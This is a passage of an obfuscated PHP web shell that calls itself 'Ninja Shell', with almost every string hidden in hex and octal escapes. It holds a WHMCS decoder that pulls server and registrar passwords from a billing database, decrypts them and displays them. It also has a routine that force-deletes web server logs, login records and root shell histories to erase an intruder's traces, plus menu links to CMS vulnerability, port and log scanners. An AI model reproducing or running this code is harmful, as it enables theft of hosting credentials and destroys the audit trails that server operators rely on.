(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("\x2f\145\x74\143\x2f\x76\141\154\151\x61\x73\145\163\57" . $domains[1][0])); echo "\74\x74\x72\x3e\x3c\x74\x64\76\74\x61\x20\x68\x72\145\x66\x3d\150\164\164\160\x3a\x2f\x2f\x77\x77\x77\56" . $domains[1][0] . "\57\x3e" . $domains[1][0] . "\74\x2f\141\x3e\74\x2f\x74\144\76\x3c\164\144\x3e" . $user["\x6e\x61\155\x65"] . "\x3c\57\164\x64\x3e\74\57\x74\x72\x3e"; flush(); } } } echo "\x3c\57\144\151\166\x3e\74\57\143\145\x6e\164\145\x72\x3e"; } elseif (isset($_GET[hex("\167\150\155\143\x73\x2d\x64\145\x63\x6f\144\145\162")])) { echo "\74\146\x6f\x72\155\40\x61\x63\x74\151\157\x6e\75\x22\x22\40\155\x65\x74\x68\x6f\x64\75\42\x70\157\163\x74\x22\x3e"; function decrypt($string, $cc_encryption_hash) { $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen($hash_key); $string = base64_decode($string); $tmp_iv = substr($string, 0, $hash_length); $string = substr($string, $hash_length, strlen($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen($string)) { if ($c != 0 and $c % $hash_length == 0) { $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); } $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); ++$c; } return $out; } function _hash($string) { if (function_exists("\163\150\141\x31")) { $hash = sha1($string); } else { $hash = md5($string); } $out = ''; $c = 0; while ($c < strlen($hash)) { $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } echo "\12\74\150\162\76\x3c\x62\162\76\12\x3c\x62\x72\x3e\x3c\143\145\x6e\x74\x65\162\76\74\x68\62\x3e\127\150\155\143\163\40\104\x65\x63\157\144\x65\162\x20\116\151\x6e\152\x61\40\x53\150\145\154\154\74\x2f\150\x32\76\x3c\57\143\145\156\x74\x65\x72\76\12\x3c\x63\145\156\x74\x65\162\x3e\12\x3c\142\162\x3e\12\x3c\x46\117\122\x4d\x20\x61\x63\x74\151\x6f\x6e\75\x27\x27\x20\x20\155\x65\164\x68\x6f\x64\x3d\47\160\x6f\x73\164\47\x3e\12\74\151\x6e\160\165\164\x20\164\x79\160\145\x3d\x27\150\x69\144\x64\x65\x6e\x27\40\x6e\x61\155\x65\75\47\146\x6f\162\x6d\x5f\141\143\x74\x69\x6f\x6e\47\40\x76\141\x6c\x75\x65\75\47\62\47\76\xa\74\142\162\x3e\12\74\164\141\x62\154\x65\x20\143\x6c\141\163\163\75\x74\141\x62\156\145\x74\x20\x73\x74\x79\x6c\x65\75\167\x69\x64\x74\150\x3a\63\x32\x30\160\170\73\160\x61\144\x64\151\156\147\x3a\x30\40\x31\x70\x78\73\x3e\12\x3c\164\162\76\x3c\x74\150\x20\143\157\154\x73\160\141\156\75\62\x3e\x57\110\115\x43\123\40\x44\x65\x63\157\144\145\162\x3c\57\164\x68\x3e\74\x2f\164\162\76\12\74\x74\162\x3e\x3c\164\144\76\x64\142\x5f\x68\157\x73\164\x20\74\x2f\164\x64\x3e\74\x74\144\x3e\74\151\x6e\x70\165\x74\x20\x20\164\171\160\145\75\x27\x74\145\x78\x74\47\x20\x73\164\x79\x6c\145\x3d\47\x63\157\x6c\x6f\162\x3a\x23\x30\x30\60\x3b\x62\141\x63\x6b\x67\162\x6f\x75\x6e\x64\55\143\157\x6c\157\162\x3a\47\40\x63\x6c\x61\x73\x73\x3d\x27\x66\x6f\162\x6d\x2d\143\x6f\156\164\x72\157\x6c\47\40\x73\x69\172\145\75\47\x33\70\x27\x20\156\141\x6d\145\75\47\x64\142\x5f\x68\157\x73\164\47\40\x76\x61\x6c\165\145\x3d\x27\154\157\143\141\x6c\150\157\163\164\x27\76\74\x2f\164\x64\76\74\x2f\164\x72\x3e\xa\x3c\x74\x72\76\74\164\x64\76\144\142\137\165\163\x65\x72\156\x61\155\145\x20\x3c\57\164\x64\76\74\164\144\x3e\74\x69\156\160\x75\x74\x20\x74\x79\160\x65\75\x27\x74\145\x78\164\47\40\163\164\171\154\145\x3d\x27\143\157\154\x6f\x72\x3a\x23\x30\60\x30\x3b\142\x61\143\153\x67\x72\157\165\x6e\x64\55\143\157\x6c\157\x72\x3a\x27\x20\143\x6c\141\x73\163\75\x27\x66\x6f\x72\155\55\143\x6f\x6e\x74\x72\x6f\x6c\x27\40\163\151\172\x65\x3d\47\x33\70\x27\40\x6e\141\155\145\75\x27\x64\x62\137\x75\x73\x65\x72\x6e\141\x6d\x65\47\40\166\141\x6c\165\x65\x3d\47\47\x3e\74\57\164\144\x3e\x3c\57\164\162\x3e\12\74\164\162\x3e\x3c\x74\144\76\144\142\137\160\141\163\163\x77\x6f\162\144\x3c\x2f\164\144\x3e\74\164\x64\x3e\74\151\156\160\x75\x74\x20\164\171\160\x65\75\x27\x74\x65\170\164\47\40\163\x74\x79\154\x65\75\x27\x63\157\154\157\x72\72\43\x30\x30\60\73\x62\x61\x63\x6b\147\162\157\165\x6e\x64\x2d\x63\x6f\154\x6f\162\72\x27\40\143\x6c\x61\163\163\x3d\x27\146\x6f\162\x6d\55\143\x6f\156\x74\x72\157\154\47\40\x73\x69\x7a\145\75\x27\63\70\x27\40\x6e\x61\x6d\x65\75\47\x64\142\x5f\x70\141\163\x73\x77\157\x72\x64\47\x20\166\x61\x6c\x75\x65\75\x27\x27\76\74\57\x74\x64\x3e\74\x2f\164\162\76\12\x3c\164\x72\76\74\x74\x64\76\144\142\x5f\x6e\x61\x6d\x65\74\57\x74\x64\76\74\164\x64\x3e\x3c\x69\156\160\165\164\40\x74\x79\160\145\x3d\47\164\x65\170\164\x27\x20\163\164\x79\154\145\75\47\x63\x6f\x6c\157\162\72\43\x30\x30\x30\73\x62\141\x63\153\147\162\x6f\x75\x6e\144\55\x63\x6f\154\x6f\162\x3a\47\40\x63\x6c\141\x73\x73\75\x27\146\157\x72\155\x2d\143\157\x6e\x74\x72\157\x6c\x27\x20\163\x69\172\x65\75\47\x33\70\47\40\156\141\x6d\145\x3d\47\x64\142\137\156\141\x6d\x65\47\40\166\x61\x6c\165\145\75\x27\x27\x3e\74\57\x74\x64\76\x3c\x2f\164\162\x3e\12\x3c\164\162\x3e\74\164\144\76\x63\x63\137\145\156\x63\162\171\x70\164\x69\157\156\x5f\x68\141\x73\150\x3c\x2f\164\144\76\74\x74\x64\76\x3c\x69\x6e\x70\x75\x74\40\x73\164\171\154\145\x3d\47\x63\157\x6c\x6f\162\x3a\43\60\x30\x30\73\142\x61\143\x6b\147\162\x6f\165\156\144\x2d\143\157\x6c\x6f\162\72\47\x20\164\x79\x70\145\x3d\47\x74\145\170\164\47\x20\x63\x6c\141\163\x73\75\47\146\157\162\155\55\143\x6f\x6e\164\x72\157\x6c\47\x20\x73\x69\x7a\x65\75\47\63\70\x27\40\156\141\x6d\x65\75\x27\143\x63\137\x65\156\x63\x72\171\x70\x74\151\x6f\x6e\x5f\150\x61\163\150\x27\40\x76\141\x6c\x75\145\75\47\x27\76\74\57\164\x64\76\74\x2f\164\162\x3e\12\x3c\x74\x64\x3e\46\x6e\x62\163\x70\x3b\x26\156\x62\163\x70\x3b\46\156\142\163\160\73\x26\156\x62\x73\x70\73\x3c\x49\116\120\x55\x54\x20\x63\154\141\163\x73\75\47\146\157\x72\155\55\x63\157\x6e\164\x72\x6f\154\x27\x20\164\171\160\145\75\x27\x73\x75\142\155\151\164\47\x20\163\x74\171\x6c\145\75\47\143\x6f\154\157\162\x3a\43\x30\60\x30\73\x62\141\x63\153\x67\x72\x6f\x75\156\x64\x2d\x63\x6f\154\157\162\x3a\x27\x20\x20\166\x61\x6c\165\145\75\47\123\x75\x62\155\151\164\47\x20\x6e\x61\155\x65\x3d\x27\x53\165\x62\x6d\x69\164\47\x3e\74\57\164\x64\76\12\74\x2f\164\141\x62\x6c\145\x3e\12\x3c\x2f\106\x4f\122\115\76\xa\x3c\57\x63\145\x6e\x74\x65\x72\x3e\xa\x3c\x68\x72\76\x3c\142\x72\76\xa"; if ($_POST["\x66\x6f\162\x6d\x5f\x61\x63\164\151\x6f\x6e"] == 2) { $db_host = $_POST["\x64\142\137\x68\x6f\163\x74"]; $db_username = $_POST["\x64\x62\x5f\x75\163\145\x72\x6e\141\155\145"]; $db_password = $_POST["\144\142\x5f\x70\x61\163\163\167\157\x72\144"]; $db_name = $_POST["\144\x62\x5f\156\x61\x6d\x65"]; $cc_encryption_hash = $_POST["\x63\143\137\x65\156\143\162\x79\x70\164\151\157\156\x5f\150\x61\x73\150"]; $link = mysql_connect($db_host, $db_username, $db_password); mysql_select_db($db_name, $link); $query = mysql_query("\x53\x45\114\x45\103\x54\x20\x2a\x20\106\122\117\115\x20\x74\142\x6c\x73\x65\162\166\x65\x72\163"); while ($v = mysql_fetch_array($query)) { $ipaddress = $v["\x69\160\x61\144\144\x72\x65\x73\163"]; $username = $v["\165\163\145\162\x6e\141\x6d\145"]; $type = $v["\164\x79\x70\145"]; $active = $v["\141\143\164\151\x76\145"]; $hostname = $v["\x68\157\163\164\156\141\155\x65"]; echo "\74\x63\x65\x6e\x74\145\162\76\x3c\x74\x61\142\154\145\x20\142\157\162\x64\145\x72\x3d\x27\x31\47\x3e"; $password = decrypt($v["\x70\141\163\163\167\x6f\162\144"], $cc_encryption_hash); echo "\74\x74\162\x3e\x3c\164\x64\76\x54\x79\160\145\x3c\57\x74\144\x3e\x3c\x74\x64\76{$type}\74\x2f\164\x64\76\x3c\57\164\162\x3e"; echo "\74\x74\x72\76\x3c\164\x64\76\x41\143\x74\151\166\145\x3c\x2f\x74\144\x3e\x3c\164\144\76{$active}\x3c\x2f\164\x64\76\74\57\164\162\76"; echo "\74\x74\162\76\x3c\164\144\76\110\x6f\x73\164\x6e\141\x6d\145\74\57\164\144\76\74\x74\x64\76{$hostname}\x3c\57\x74\144\x3e\74\x2f\x74\162\x3e"; echo "\x3c\x74\162\x3e\74\164\x64\x3e\x49\160\x3c\57\x74\144\x3e\74\164\x64\x3e{$ipaddress}\74\x2f\164\144\76\74\x2f\x74\162\x3e"; echo "\74\164\162\76\74\x74\x64\76\125\163\x65\x72\x6e\x61\x6d\145\x3c\x2f\x74\x64\76\x3c\164\x64\x3e{$username}\74\57\x74\x64\x3e\x3c\57\164\162\76"; echo "\x3c\164\162\x3e\74\x74\144\76\120\x61\x73\163\x77\x6f\162\144\74\57\164\x64\76\x3c\x74\x64\x3e{$password}\x3c\x2f\164\144\x3e\x3c\57\164\162\76"; echo "\74\x2f\164\141\142\154\145\76\x3c\142\162\x3e\x3c\142\x72\x3e\x3c\57\143\145\x6e\164\x65\162\76"; } $link = mysql_connect($db_host, $db_username, $db_password); mysql_select_db($db_name, $link); $query = mysql_query("\x53\x45\x4c\105\103\124\40\x2a\x20\x46\x52\117\115\40\164\142\154\x72\145\x67\151\x73\164\x72\x61\x72\x73"); echo "\74\143\x65\156\164\x65\162\x3e\104\x6f\x6d\x61\151\x6e\x20\x52\x65\x73\x65\x6c\154\145\162\40\74\x62\x72\76\x3c\x74\141\142\154\x65\40\x63\x6c\x61\163\163\x3d\164\141\142\156\x65\164\x20\x62\157\162\x64\x65\x72\75\47\61\47\x3e"; echo "\x3c\164\162\x3e\74\x74\144\x3e\122\x65\x67\151\x73\x74\x72\x61\x72\x3c\57\164\x64\x3e\74\164\144\76\123\145\x74\x74\x69\x6e\x67\74\57\x74\144\76\74\x74\144\76\126\141\x6c\165\x65\x3c\x2f\x74\x64\x3e\x3c\x2f\x74\162\x3e"; while ($v = mysql_fetch_array($query)) { $registrar = $v["\x72\x65\147\x69\163\x74\162\x61\162"]; $setting = $v["\x73\145\x74\x74\x69\x6e\x67"]; $value = decrypt($v["\166\x61\154\165\145"], $cc_encryption_hash); if ($value == '') { $value = 0; } $password = decrypt($v["\x70\141\163\163\167\x6f\x72\144"], $cc_encryption_hash); echo "\x3c\164\x72\x3e\74\x74\x64\76{$registrar}\x3c\57\164\144\x3e\74\164\x64\x3e{$setting}\74\x2f\164\x64\x3e\x3c\164\144\76{$value}\x3c\57\x74\144\76\74\57\164\162\76"; } } } elseif (isset($_GET[hex("\x64\145\x6c\x65\x74\145\55\154\x6f\147\163")])) { echo "\x3c\142\x72\76\x3c\x63\145\156\164\x65\x72\76\74\142\76\74\x73\160\x61\x6e\76\x44\x65\154\x65\x74\145\x20\x4c\157\147\x73\x20\50\x20\106\157\x72\40\x53\141\x66\145\40\x29\74\x2f\x73\x70\141\x6e\x3e\x3c\x2f\142\76\x3c\143\145\156\x74\x65\162\76\x3c\x62\162\76"; echo "\74\x74\x61\x62\154\145\x20\x73\x74\x79\x6c\145\x3d\x27\x6d\141\162\x67\151\x6e\72\x20\x30\x20\141\165\x74\157\x3b\47\76\x3c\x74\x72\40\166\x61\154\x69\x67\x6e\75\47\x74\157\160\47\76\x3c\x74\x64\40\x61\154\x69\147\156\x3d\47\154\145\146\164\47\x3e"; exec("\x72\x6d\40\x2d\x72\x66\x20\57\x74\x6d\x70\x2f\x6c\x6f\x67\x73"); exec("\x72\155\x20\55\162\146\x20\57\162\157\x6f\164\57\56\x6b\163\150\137\150\151\x73\x74\x6f\x72\171"); exec("\x72\x6d\40\55\x72\x66\x20\x2f\162\157\157\164\x2f\56\x62\141\163\150\137\x68\x69\163\x74\157\x72\x79"); exec("\x72\155\40\x2d\162\146\40\x2f\x72\157\x6f\164\57\x2e\142\141\x73\150\x5f\154\157\147\x6f\x75\164"); exec("\162\x6d\x20\55\162\146\x20\x2f\165\x73\x72\57\154\157\143\141\x6c\x2f\x61\x70\x61\143\x68\145\57\x6c\157\147\x73"); exec("\x72\x6d\40\55\162\146\40\x2f\x75\x73\x72\x2f\154\157\x63\x61\x6c\x2f\x61\160\141\x63\x68\x65\x2f\x6c\157\147"); exec("\x72\155\40\55\162\x66\x20\x2f\x76\x61\x72\57\141\160\141\143\x68\145\x2f\x6c\157\147\163"); exec("\x72\x6d\x20\55\162\146\x20\57\166\141\162\57\141\160\141\143\x68\145\x2f\154\157\147"); exec("\x72\155\40\x2d\x72\146\x20\57\x76\141\x72\x2f\x72\x75\x6e\x2f\x75\x74\x6d\x70"); exec("\x72\x6d\x20\55\x72\146\x20\x2f\x76\x61\162\x2f\x6c\157\147\x73"); exec("\162\x6d\x20\x2d\x72\x66\40\x2f\166\x61\x72\x2f\x6c\157\x67"); exec("\162\x6d\x20\55\x72\146\x20\x2f\166\141\x72\x2f\x61\144\x6d"); exec("\162\x6d\x20\x2d\x72\146\40\x2f\x65\x74\143\x2f\167\164\155\x70"); exec("\x72\x6d\40\x2d\x72\146\40\x2f\x65\x74\143\57\x75\164\155\160"); exec("\162\x6d\x20\x2d\x72\146\40{$HISTFILE}"); exec("\162\x6d\x20\x2d\162\x66\x20\x2f\166\141\162\57\154\x6f\x67\x2f\154\x61\x73\164\x6c\x6f\147"); exec("\162\x6d\40\55\162\146\40\57\166\141\162\57\154\157\147\x2f\167\x74\155\x70"); shell_exec("\162\x6d\40\55\x72\x66\40\57\164\155\160\57\154\157\x67\163"); shell_exec("\162\x6d\40\x2d\162\x66\x20\57\162\x6f\x6f\x74\x2f\56\x6b\163\150\137\150\151\x73\x74\157\162\x79"); shell_exec("\162\155\40\55\162\146\x20\57\162\157\x6f\164\57\x2e\142\141\x73\150\x5f\150\151\x73\164\x6f\162\171"); shell_exec("\x72\155\40\x2d\x72\146\40\57\x72\x6f\x6f\x74\57\x2e\x62\141\163\150\x5f\x6c\157\x67\x6f\x75\x74"); shell_exec("\x72\155\40\55\162\146\40\x2f\165\163\162\x2f\x6c\x6f\x63\x61\154\x2f\x61\x70\x61\143\150\x65\57\154\x6f\x67\x73"); shell_exec("\162\x6d\x20\55\x72\x66\40\57\x75\x73\x72\x2f\x6c\157\143\x61\154\57\141\x70\141\143\x68\145\x2f\154\157\147"); shell_exec("\x72\155\40\x2d\x72\146\40\x2f\166\x61\162\57\141\160\141\x63\150\x65\57\154\157\147\163"); shell_exec("\162\155\x20\x2d\162\146\40\57\x76\x61\162\x2f\141\160\141\143\x68\145\x2f\154\157\147"); shell_exec("\x72\x6d\40\x2d\x72\146\40\x2f\x76\x61\x72\x2f\162\165\156\x2f\165\x74\x6d\160"); shell_exec("\162\155\40\55\x72\146\x20\57\166\x61\x72\x2f\x6c\157\147\x73"); shell_exec("\x72\155\40\55\x72\x66\x20\x2f\x76\x61\162\57\154\x6f\147"); shell_exec("\162\x6d\x20\x2d\162\x66\40\x2f\166\141\162\57\x61\x64\x6d"); shell_exec("\x72\155\x20\55\x72\x66\40\57\x65\164\143\x2f\167\x74\x6d\x70"); shell_exec("\x72\155\40\x2d\x72\x66\40\57\x65\x74\x63\57\x75\x74\x6d\160"); shell_exec("\162\x6d\x20\x2d\162\146\x20{$HISTFILE}"); shell_exec("\x72\155\x20\x2d\x72\146\x20\57\x76\141\162\57\154\157\147\x2f\154\x61\x73\x74\x6c\157\x67"); shell_exec("\162\155\x20\x2d\162\x66\x20\57\x76\141\162\x2f\x6c\x6f\147\x2f\x77\x74\155\x70"); passthru("\x72\x6d\40\55\162\146\40\x2f\x74\x6d\160\x2f\154\157\147\x73"); passthru("\162\x6d\40\x2d\162\146\x20\57\162\157\x6f\x74\x2f\56\153\163\150\137\x68\151\163\164\157\x72\171"); passthru("\x72\x6d\40\55\x72\x66\x20\57\162\157\157\x74\x2f\56\x62\141\163\150\137\x68\151\163\x74\157\x72\171"); passthru("\x72\x6d\40\x2d\x72\146\x20\x2f\162\x6f\157\164\x2f\56\x62\x61\x73\x68\137\x6c\157\147\157\165\164"); passthru("\162\x6d\x20\x2d\x72\146\40\x2f\x75\163\x72\x2f\154\157\143\141\x6c\57\x61\x70\x61\x63\150\145\57\x6c\x6f\x67\x73"); passthru("\x72\155\40\x2d\x72\146\40\57\165\x73\162\57\154\x6f\143\141\154\x2f\x61\x70\141\143\x68\145\x2f\x6c\x6f\x67"); passthru("\162\155\40\55\162\x66\40\57\166\141\162\x2f\x61\160\x61\143\x68\145\x2f\x6c\x6f\x67\x73"); passthru("\x72\x6d\x20\55\162\x66\x20\x2f\166\141\162\57\x61\160\x61\143\150\x65\57\x6c\x6f\147"); passthru("\x72\155\40\55\x72\x66\x20\x2f\x76\x61\162\57\x72\x75\156\57\x75\164\x6d\x70"); passthru("\x72\x6d\x20\x2d\162\x66\40\57\x76\x61\x72\57\x6c\157\147\163"); passthru("\162\155\x20\x2d\x72\x66\40\57\x76\x61\x72\x2f\x6c\157\x67"); passthru("\162\155\x20\x2d\162\146\40\57\166\x61\162\x2f\x61\x64\155"); passthru("\x72\x6d\40\55\162\x66\x20\x2f\x65\x74\x63\57\167\164\x6d\160"); passthru("\x72\155\x20\55\162\x66\40\57\145\x74\x63\x2f\165\164\x6d\x70"); passthru("\x72\x6d\x20\x2d\x72\146\x20{$HISTFILE}"); passthru("\x72\x6d\x20\x2d\162\146\40\57\x76\x61\x72\57\154\157\147\57\154\x61\163\164\x6c\157\147"); passthru("\162\x6d\40\x2d\x72\x66\x20\57\x76\141\162\57\x6c\157\147\57\167\164\x6d\x70"); system("\162\x6d\40\x2d\162\x66\40\x2f\164\155\x70\x2f\154\157\147\x73"); sleep(2); echo "\74\142\x72\76\104\x65\154\x65\164\151\156\147\x20\x2e\x2e\56\57\164\155\160\57\x6c\x6f\x67\163\40"; sleep(2); system("\162\x6d\x20\x2d\162\x66\x20\x2f\x72\157\x6f\x74\x2f\x2e\142\141\x73\150\x5f\x68\151\163\x74\157\x72\171"); sleep(2); echo "\x3c\x70\76\x44\145\x6c\145\x74\x69\x6e\147\x20\x2e\56\x2e\57\x72\157\x6f\x74\x2f\x2e\142\x61\x73\x68\x5f\x68\151\x73\164\x6f\x72\171\x20\x3c\57\160\x3e"; system("\x72\x6d\x20\x2d\162\x66\x20\x2f\x72\x6f\x6f\x74\x2f\56\x6b\163\x68\x5f\x68\151\x73\164\x6f\x72\171"); sleep(2); echo "\74\x70\x3e\x44\145\x6c\x65\x74\x69\x6e\x67\40\56\56\x2e\57\x72\x6f\x6f\x74\x2f\56\153\163\x68\x5f\150\151\x73\164\157\x72\171\40\74\x2f\x70\x3e"; system("\x72\x6d\x20\55\x72\146\x20\x2f\x72\x6f\x6f\x74\57\56\x62\141\x73\150\137\154\x6f\147\x6f\x75\x74"); sleep(2); echo "\x3c\x70\x3e\104\x65\x6c\145\164\151\x6e\147\40\56\56\56\57\162\x6f\157\164\x2f\56\142\141\x73\x68\137\154\157\x67\157\x75\164\40\74\x2f\x70\76"; system("\x72\155\x20\x2d\x72\x66\x20\x2f\x75\x73\x72\x2f\154\x6f\x63\141\x6c\x2f\x61\x70\x61\x63\x68\145\x2f\154\157\x67\x73"); sleep(2); echo "\x3c\x70\x3e\104\145\x6c\x65\x74\x69\x6e\147\x20\x2e\x2e\56\x2f\x75\x73\162\x2f\154\x6f\x63\x61\x6c\57\141\x70\x61\143\150\145\57\154\x6f\x67\x73\x20\x3c\x2f\x70\76"; system("\162\155\x20\x2d\x72\146\40\57\165\163\162\57\154\x6f\143\141\x6c\57\141\160\141\143\150\145\57\154\157\147"); sleep(2); echo "\x3c\x70\76\104\145\x6c\145\x74\151\156\147\40\56\56\x2e\57\165\163\162\x2f\154\157\x63\x61\154\x2f\x61\160\141\143\x68\145\x2f\x6c\157\147\x20\x3c\57\160\x3e"; system("\162\x6d\40\x2d\162\146\40\x2f\166\x61\162\57\x61\x70\x61\x63\150\x65\57\x6c\x6f\147\163"); sleep(2); echo "\x3c\x70\x3e\x44\x65\x6c\x65\164\151\156\147\40\56\56\x2e\x2f\166\141\x72\57\x61\x70\141\143\150\145\57\x6c\157\147\163\40\74\57\160\76"; system("\162\x6d\40\x2d\162\x66\x20\x2f\x76\x61\162\x2f\141\160\x61\143\x68\x65\x2f\154\x6f\147"); sleep(2); echo "\x3c\160\76\x44\x65\x6c\x65\164\x69\156\x67\x20\56\56\56\57\x76\141\x72\x2f\x61\160\141\143\150\145\57\x6c\x6f\x67\40\74\x2f\160\x3e"; system("\x72\x6d\x20\55\x72\x66\40\x2f\x76\141\x72\57\x72\165\156\57\x75\x74\x6d\x70"); sleep(2); echo "\x3c\160\76\x44\145\x6c\145\164\151\x6e\147\x20\56\x2e\x2e\x2f\x76\x61\x72\x2f\162\165\x6e\57\165\x74\x6d\160\40\74\x2f\x70\76"; system("\162\x6d\x20\55\x72\146\40\x2f\x76\141\162\x2f\x6c\157\147\163"); sleep(2); echo "\x3c\x70\76\x44\145\154\x65\x74\151\156\147\40\x2e\x2e\56\57\166\141\162\x2f\154\x6f\x67\x73\x20\x3c\x2f\160\76"; system("\x72\x6d\x20\55\162\x66\40\x2f\x76\141\162\x2f\154\x6f\x67"); sleep(2); echo "\74\160\76\104\x65\154\x65\x74\x69\156\147\x20\56\x2e\x2e\57\x76\x61\x72\x2f\x6c\157\x67\x20\74\57\160\76"; system("\x72\155\x20\55\162\146\40\x2f\166\141\x72\x2f\x61\144\x6d"); sleep(2); echo "\x3c\160\x3e\104\x65\x6c\x65\164\x69\156\x67\40\56\x2e\56\x2f\x76\141\x72\57\x61\144\155\40\74\57\160\76"; system("\x72\x6d\x20\55\x72\146\x20\57\145\164\x63\x2f\167\x74\155\x70"); sleep(2); echo "\74\x70\76\104\145\x6c\x65\164\151\156\x67\x20\x2e\56\x2e\x2f\145\x74\143\x2f\x77\164\x6d\160\40\x3c\x2f\x70\x3e"; system("\162\155\x20\x2d\x72\146\40\x2f\145\164\x63\x2f\165\164\x6d\x70"); sleep(2); echo "\74\x70\76\x44\x65\154\145\x74\151\x6e\x67\x20\x2e\x2e\56\x2f\x65\x74\x63\57\165\164\x6d\160\x20\74\x2f\x70\76"; system("\162\x6d\x20\x2d\162\x66\40{$HISTFILE}"); sleep(2); echo "\x3c\160\76\x44\145\x6c\145\x74\151\x6e\147\x20\56\x2e\x2e\44\110\x49\x53\x54\106\111\114\105\x20\74\x2f\x70\x3e"; system("\x72\155\40\55\162\x66\x20\57\x76\141\x72\57\x6c\x6f\147\x2f\154\141\x73\164\154\x6f\147"); sleep(2); echo "\x3c\160\76\x44\145\154\145\164\151\x6e\147\40\x2e\x2e\x2e\x2f\x76\x61\162\57\x6c\x6f\x67\x2f\x6c\x61\163\164\x6c\x6f\x67\40\74\57\160\x3e"; system("\x72\155\x20\x2d\x72\146\x20\57\166\141\162\x2f\154\157\147\57\x77\x74\x6d\160"); sleep(2); echo "\x3c\160\x3e\x44\x65\154\145\164\151\156\147\x20\x2e\x2e\56\x2f\x76\141\162\x2f\x6c\157\147\57\x77\164\x6d\160\x20\74\57\x70\x3e"; sleep(4); echo "\x3c\x62\162\76\74\142\162\x3e\74\x70\x3e\x59\x6f\x75\162\x20\x54\x72\x61\x63\x65\163\40\110\141\x73\x20\102\145\x65\156\40\x53\165\x63\x63\x65\163\163\146\x75\x6c\x6c\171\x20\x44\145\154\145\164\x69\x6e\x67\40\x2e\x2e\56\106\x72\x6f\155\x20\x74\x68\x65\40\x53\145\x72\166\145\x72"; echo "\74\57\164\144\76\74\57\164\x72\x3e\74\x2f\x74\x61\x62\x6c\145\76"; } elseif (isset($_GET[hex("\x73\x63\141\156\x6e\x65\162")])) { echo "\x3c\x68\162\76\74\x62\162\76"; echo "\74\143\145\156\x74\x65\162\x3e\74\150\x32\76\x53\143\141\x6e\156\145\162\x20\116\x69\156\x6a\141\40\123\150\145\x6c\x6c\x3c\57\150\62\76\x3c\57\143\145\156\x74\145\x72\76\74\x62\162\x3e"; echo "\x3c\146\157\x72\x6d\40\x6d\x65\x74\x68\x6f\x64\40\75\x20\47\120\x4f\123\x54\47\x3e\12\11\x9\x9\11\x9\11\x3c\x63\145\156\x74\x65\x72\x3e\xa\11\x9\x9\11\11\11\x3c\144\151\166\x20\x63\x6c\x61\163\163\40\x3d\x20\x27\x72\x6f\167\x20\x63\154\x65\x61\x72\146\x69\x78\47\x3e\12\x9\11\11\x9\11\x9\x3c\x64\151\x76\x20\143\154\x61\x73\x73\x20\x3d\40\47\143\x6f\154\55\x6d\x64\55\x34\47\x3e\xa\x9\11\11\x9\11\x9\x3c\141\x20\x63\154\141\163\163\x20\x3d\40\x27\x66\x6f\162\x6d\x2d\143\157\156\164\x72\157\x6c\40\x61\x6a\170\x27\x20\x68\162\x65\146\40\x3d\x20\x27\x3f\144\75" . hex($d) . "\x26" . hex("\x63\155\163\166\x75\x6c\x6e") . "\47\40\x73\164\171\154\145\75\x27\167\151\x64\164\x68\x3a\40\x32\x35\60\160\x78\x3b\47\x20\150\145\151\x67\150\164\x3d\x27\x31\x30\47\76\74\143\145\156\164\x65\162\x3e\103\115\123\40\x56\x75\x6c\156\145\162\x61\142\x69\154\151\164\171\40\x53\x63\141\x6e\x6e\145\x72\x3c\57\x63\145\x6e\x74\x65\162\76\x3c\57\141\x3e\xa\11\x9\11\11\x9\x9\74\57\144\151\x76\76\12\11\11\11\x9\11\x9\74\144\151\166\x20\x63\x6c\141\x73\163\x20\x3d\x20\x27\x63\x6f\x6c\x2d\155\x64\x2d\x34\x27\76\12\x9\11\11\x9\x9\11\x3c\141\x20\143\x6c\141\163\163\40\x3d\40\x27\146\157\x72\155\x2d\143\x6f\x6e\164\162\x6f\154\40\x61\152\170\x27\40\x68\162\x65\146\x20\75\x20\47\x3f\x64\75" . hex($d) . "\46" . hex("\x70\157\x72\x74\x2d\x73\143\141\156\x6e\145\x72") . "\47\40\x73\164\171\x6c\145\x3d\47\167\151\x64\x74\x68\x3a\x20\x32\x35\60\x70\170\x3b\47\40\150\145\x69\x67\x68\164\75\x27\61\x30\47\76\x3c\x63\145\x6e\164\145\x72\x3e\x50\x6f\162\x74\40\123\143\x61\156\156\145\162\74\x2f\143\x65\x6e\x74\x65\162\x3e\x3c\57\x61\x3e\12\11\x9\11\x9\11\11\x3c\x2f\144\151\166\x3e\12\x9\x9\x9\11\x9\11\74\x64\151\x76\40\x63\x6c\x61\163\x73\x20\75\40\47\143\x6f\154\x2d\155\x64\55\x34\x27\x3e\12\11\11\x9\11\11\x9\74\x61\40\143\x6c\141\x73\x73\40\75\x20\x27\146\157\162\155\55\143\157\156\164\x72\x6f\154\40\141\152\x78\47\40\x68\x72\145\x66\40\x3d\40\47\77\144\75" . hex($d) . "\46" . hex("\154\157\147\x73\55\x73\x63\141\156\156\145\x72") . "\47\40\x73\164\171\x6c\145\75\47\x77\x69\x64\164\x68\72\x20\x32\65\x30\x70\170\73\x27\40\150\x65\151\x67\x68\164\75\47\x31\x30\x27\76\x3c\x63\145\156\164\x65\x72\76\x4c\x6f\x67\x73\x20\123\143\x61\156\x6e\x65\162\x3c\x2f\x63\145\x6e\x74\145\x72\76\x3c\57\141\76\12\11\x9\11\11\11\11\74\57\144\x69\x76\x3e\xa\x9\11\x9\x9\x9\11\74\x2f\x64\x69\166\76\x3c\x2f\x63\145\x6e\164\145\162\x3e\x3c\57\x66\157\162\155\x3e"; echo "\x3c\150\162\x3e"; } elseif (isset($_GET[hex("\143\x6d\163\x76\165\154\x6e")])) { @set_time_limit(0); @error_reporting(0); function ask_exploit_db($component) { $exploitdb = 